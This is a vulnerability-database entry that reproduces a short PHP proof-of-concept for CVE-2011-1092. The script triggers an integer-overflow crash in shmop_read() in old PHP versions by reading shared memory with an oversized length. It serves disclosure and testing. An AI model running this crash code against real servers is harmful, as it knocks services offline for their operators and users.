Lucene search

K
seebugRootSSV:71455
HistoryJul 01, 2014 - 12:00 a.m.

PHP <= 5.3.6 shmop_read() Integer Overflow DoS

2014-07-0100:00:00
Root
www.seebug.org
58

0.028 Low

EPSS

Percentile

89.5%

No description provided by source.


                                                &#60;?php
# Exploit Title: PHP &#60;=5.3.5 Integer Overflow DoS
# Date: 12-03-11
# Author: Jose Carlos Norte - www.rooibo.com
# Software Link: www.php.net
# Version: &#60;= 5.3.5
# Tested on: Ubuntu Linux
# CVE : CVE-2011-1092

$shm_key = ftok(__FILE__, &#39;t&#39;);
$shm_id = shmop_open($shm_key, &#34;c&#34;, 0644, 100);
$shm_data = shmop_read($shm_id, 1, 2147483647);
//if there is no segmentation fault past this point, we have 2gb of memory!
//or we are in a patched php
echo &#34;this php version is not vulnerable!&#34;;

?&#62;